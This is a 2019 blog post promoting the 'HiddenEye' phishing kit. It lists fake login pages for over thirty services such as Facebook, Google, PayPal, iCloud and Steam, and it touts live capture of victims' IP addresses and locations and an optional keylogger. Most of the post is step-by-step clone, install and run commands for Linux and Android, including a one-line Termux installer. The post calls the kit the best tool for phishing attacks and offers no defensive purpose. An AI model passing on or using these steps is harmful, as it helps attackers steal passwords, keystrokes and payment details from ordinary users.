Breaking

Post Top Ad

Your Ad Spot

Sunday, July 7, 2019

Hidden Eye (Best Advance Phising Tool)













HiddenEye Best and Powerful Phishing Tool

Phishing is the fraudulent attempt to obtain sensitive information such as usernames, passwords and credit card details by disguising as a trustworthy entity in an electronic communication. Typically carried out by email spoofing or instant messaging, it often directs users to enter personal information at a fake website, the look and feel of which are identical to the legitimate site.

Phishing is an example of social engineering techniques being used to deceive users. Users are often lured by communications purporting to be from trusted parties such as social web sites, auction sites, banks, online payment processors or IT administrators.
The annual worldwide impact of phishing could be as high as US$5 billion. Attempts to deal with phishing incidents include legislation, user training, public awareness, and technical security measures - because phishing attacks also often exploit weaknesses in current web security.
The word itself is a neologism created as a homophone of fishing, due to the similarity of using a bait in an attempt to catch a victim.

WHAT'S NEW FEATURES

1) LIVE ATTACK
  • Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.
2) COMPATIBILITY
  • All the sites are mobile compatible.
3) KEYLOGGER
  • Now you will also have the ability to capture all the keystokes of victim.
  • You can now Deploy Keyloggers With (Y/N) option.
  • Major issues fixed.
4) ANDROID SUPPORT
  • We care about Android Users, So now we have came with two ways to run HiddenEye in Android Devices.
(A) UserLand App
  • You Have to Download UserLand App. Click Here To Download it.
  • To read more how to set up userland app Read HERE
(B) Termux App
  • You Have to Download Termux App. Click Here To Download it.
  • For Further instruction Check Instructions
  • Termux Users Clone With This Command , Unless Errors may occur during Running.
git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git

5) NEW LOOK PROVIDED
  • NOW FOCUS EASILY ON TASKS...
  • CUSTOMIZE APP WITH YOUR OWN THEMES
6) SERVEO URL TYPE SELECTION AVAILABLE NOW
  • Major issues with serveo is fixed.
  • Now You can choose out of CUSTOM URL and RANDOM URL.
7) LARGE COLLECTION OF PHISHING PAGES ADDED
  • Pages are taken from various tool including ShellPhish , Blackeye , SocialFish .

FOR FURTHER INSTALLATION PROCEDURE - (CHECK INSTRUCTIONS)

AVAILABLE PAGES

1) Facebook:
  • Traditional Facebook login page.
  • Advanced Poll Method.
  • Fake Security login with Facebook Page.
  • Facebook messenger login page.
2) Google:
  • Traditional Google login page.
  • Advanced Poll Method.
  • New Google Page.
3) LinkedIn:
  • Traditional LinkedIn login page.
4) Github:
  • Traditional Github login page.
5) Stackoverflow:
  • Traditional Stackoverflow login page.
6) Wordpress:
  • Similar Wordpress login page.
7) Twitter:
  • Traditional Twitter login page.
8) Instagram:
  • Traditional Instagram login page.
  • Instagram Autoliker Phishing Page.
  • Instagram Profile Scenario Advanced attack.
  • Instagram Badge Verify Attack [New]
  • Instagram AutoFollower Phishing Page by (https://github.com/thelinuxchoice)
9) SNAPCHAT PHISHING:
  • Traditional Snapchat Login Page
10) YAHOO PHISHING:
  • Traditional Yahoo Login Page
11) TWITCH PHISHING:
  • Traditional Twitch Login Page [ Login With Facebook Also Available ]
12) MICROSOFT PHISHING:
  • Traditional Microsoft-Live Web Login Page
13) STEAM PHISHING:
  • Traditional Steam Web Login Page
14) VK PHISHING:
  • Traditional VK Web Login Page
  • Advanced Poll Method
15) ICLOUD PHISHING:
  • Traditional iCloud Web Login Page
16) GitLab PHISHING:
  • Traditional GitLab Login Page
17) NetFlix PHISHING:
  • Traditional Netflix Login Page
18) Origin PHISHING:
  • Traditional Origin Login Page
19) Pinterest PHISHING:
  • Traditional Pinterest Login Page
20) Protonmail PHISHING:
  • Traditional Protonmail Login Page
21) Spotify PHISHING:
  • Traditional Spotify Login Page
22) Quora PHISHING:
  • Traditional Quora Login Page
23) PornHub PHISHING:
  • Traditional PornHub Login Page
24) Adobe PHISHING:
  • Traditional Adobe Login Page
25) Badoo PHISHING:
  • Traditional Badoo Login Page
26) CryptoCurrency PHISHING:
  • Traditional CryptoCurrency Login Page
27) DevianArt PHISHING:
  • Traditional DevianArt Login Page
28) DropBox PHISHING:
  • Traditional DropBox Login Page
29) eBay PHISHING:
  • Traditional eBay Login Page
30) MySpace PHISHING:
  • Traditional Myspace Login Page
31) PayPal PHISHING:
  • Traditional PayPal Login Page
32) Shopify PHISHING:
  • Traditional Shopify Login Page
33) Verizon PHISHING:
  • Traditional Verizon Login Page
34) Yandex PHISHING:
  • Traditional Yandex Login Page

How to use HiddenEye Tool?

HiddenEye is the best tool for performing phishing attacks. In this tool many social networking's phishing pages are available like Facebook, Instagram, Github, Twitter, etc. You don't need any type of coding to create them.
So, Now I will tell you to use this tool.

BlackArch official repository

sudo pacman -S hidden-eye
to run just use
sudo hidden-eye

CLONE

git clone https://github.com/DarkSecDevelopers/HiddenEye.git

RUNNING (In Linux)

cd HiddenEye
sudo apt install python3-pip
sudo pip3 install -r requirements.txt
chmod 777 HiddenEye.py
python3 HiddenEye.py

OR
./HiddenEye.py    

RUNNING (Arch Linux or Manjaro)

cd HiddenEye
sudo pacman -Syu
sudo pacman -S python-pip
sudo pip3 install -r requirements.txt
chmod 777 HiddenEye.py
sudo python3 HiddenEye.py

OR
sudo ./HiddenEye.py    

FOR ANDROID USERS

1) INSTALLING IN (USERLAND APP)

Install userland app from playstore.

Set up app and install kali from app.Set ssh username(anyname) and password. 

When kali will run it'll ask for password type the ssh password.Then do su.After that kali will run on your device wothout root and do apt update For more info read here (https://null-byte.wonderhowto.com/how-to/android-for-hackers-turn-android-phone-into-hacking-device-without-root-0189649/)

apt install python3 && python3-pip && unzip && php && git

git clone https://github.com/DarkSecDevelopers/HiddenEye.git

cd HiddenEye

chmod 777 HiddenEye.py

pip3 install -r requirements.txt

python3 HiddenEye.py

2) INSTALLING IN (TERMUX APP)

First install { Termux } from Playstore.

After opening Follow below commands One by one

pkg install git python php curl openssh grep

pip3 install wget

git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git

cd HiddenEye

chmod 777 HiddenEye.py

python HiddenEye.py

or

./HiddenEye.py

ONE LINE COMMAND TO INSTALL IN TERMUX(ANDROID). Just copy/paste this single command and hit Enter .. ALL DONE

First install { Termux } from Playstore.

After opening Copy and run this Single Command.

pkg install git python php curl openssh grep && pip3 install wget && git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py 

No comments:

Post a Comment

Post Top Ad

Your Ad Spot